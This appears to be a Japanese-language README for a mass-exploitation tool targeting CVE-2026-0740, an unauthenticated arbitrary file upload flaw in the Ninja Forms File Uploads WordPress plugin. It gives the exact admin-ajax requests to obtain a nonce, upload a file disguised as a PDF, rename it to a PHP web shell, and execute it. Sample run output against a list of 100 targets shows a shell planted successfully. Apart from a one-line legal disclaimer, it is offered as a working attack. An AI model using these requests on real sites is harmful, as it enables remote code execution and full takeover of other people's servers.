
Automated mass exploiter for CVE-2026-0740、Ninja Forms File Uploads プラグインにおける未認証の任意ファイルアップロードを悪用し、細工されたアップロードを介してリモートコード実行を可能にする自動化された大量エクスプロイター。
WordPress用プラグイン「Ninja Forms - File Uploads」は、全バージョン(3.3.26を含む)において、NF_FU_AJAX_Controllers_Uploads::handle_upload 関数にファイルタイプの検証と権限チェックが欠如しているため、認証なしの任意ファイルアップロードに対して脆弱です。
この欠陥により、認証されていない攻撃者は以下を行うことが可能です:
field_id に対して有効なnonceを生成する。~ CVSSスコア: 9.8(クリティカル)
~ 影響を受けるバージョン: <= 3.3.26
ステップ1: nonceを取得する
────────────────────────────────────
POST /wp-admin/admin-ajax.php
データ: action=nf_fu_get_new_nonce&field_id=7&form_id=7
レスポンス: {"success":true,"data":{"nonce":"7a850757a1"}}
│
▼
ステップ2: 偽装ファイルのアップロード + PHPへのリネーム
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
データ:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (ホワイトリスト登録済み拡張子)
- doc_pdf=shadow.php (リネーム先)
│
▼
ステップ3: サーバーが悪意のあるファイルを保存
─────────────────────────────────────
場所: /wp-content/uploads/ninja-forms/tmp/shadow.php
内容: PHPシェル(アップローダー / ウェブシェル)
│
▼
ステップ4: アップロードしたファイルを実行
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ ウェブシェルを実行
→ サーバーを完全に乗っ取る
- フィールド実験からの結論:
1. `nf_fu_get_new_nonce` エンドポイントは、フィールドの存在を確認せずに有効なnonceを返す
→ `field_id` と `form_id` パラメータの検証なし(任意のランダムIDで動作)
2. リネーム機能における重大な論理的欠陥
→ プラグインはPOSTパラメータを介してユーザー指定のファイル名を受け入れる
→ リネーム後の最終ファイル拡張子に対する検証なし
3. アップロードされたファイルはWebアクセス可能なディレクトリに直接保存される
→ /wp-content/uploads/ninja-forms/tmp/
4. このツールの所有者はとてもハンサムです
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
╰┈➤ 完全なレスポンス表示
[+] 100件のターゲットを読み込みました
[1/100]
😈 [FRISKA RESEARCHER] 攻撃対象: https://example.com
[*] nonceを取得中...
[*] HTTPステータス: 400
[*] レスポンス: 0
[-] HTTPエラー: 400
[2/100]
😈 [FRISKA RESEARCHER] 攻撃対象: https://www.test.com
[*] nonceを取得中...
[*] HTTPステータス: 200
[*] レスポンス: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] nonce: b0404ec210
[*] シェルをアップロード中...
[*] アップロードレスポンス: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}
============================================================
🔥 シェルアップローダー: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================
所有していない、またはテスト許可を得ていないシステムへの不正使用は違法です。